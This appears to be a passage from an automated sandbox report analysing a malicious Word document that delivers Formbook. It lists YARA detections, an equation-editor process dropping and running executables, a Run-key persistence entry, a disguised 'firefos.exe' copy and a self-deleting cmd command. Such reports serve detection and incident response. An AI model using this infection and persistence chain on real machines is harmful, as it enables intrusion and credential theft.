          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: skypoundx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: skypound83892.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: firefos.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@18/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$MAXTRADING.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD2D.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: VOMAXTRADING.docVirustotal: Detection: 43%
          Source: VOMAXTRADING.docReversingLabs: Detection: 39%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: VOMAXTRADING.docStatic file information: File size 1677719 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: firefos.exe
          Source: Binary string: napstat.pdb source: skypound83892.exe, 00000006.00000002.2203275635.0000000000430000.00000040.00000001.sdmp
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B3B5 push eax; ret 6_2_0041B408
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B46C push eax; ret 6_2_0041B472
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B402 push eax; ret 6_2_0041B408
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B40B push eax; ret 6_2_0041B472
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094DFA1 push ecx; ret 6_2_0094DFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214DFA1 push ecx; ret 12_2_0214DFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B3B5 push eax; ret 12_2_0013B408
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B402 push eax; ret 12_2_0013B408
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B40B push eax; ret 12_2_0013B472
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B46C push eax; ret 12_2_0013B472
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B3B5 push eax; ret 15_2_0041B408
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B46C push eax; ret 15_2_0041B472
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B402 push eax; ret 15_2_0041B408
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B40B push eax; ret 15_2_0041B472
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094DFA1 push ecx; ret 15_2_0094DFB4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BDFA1 push ecx; ret 16_2_008BDFB4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\skypound83892.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FirefoxeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefosJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefosJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
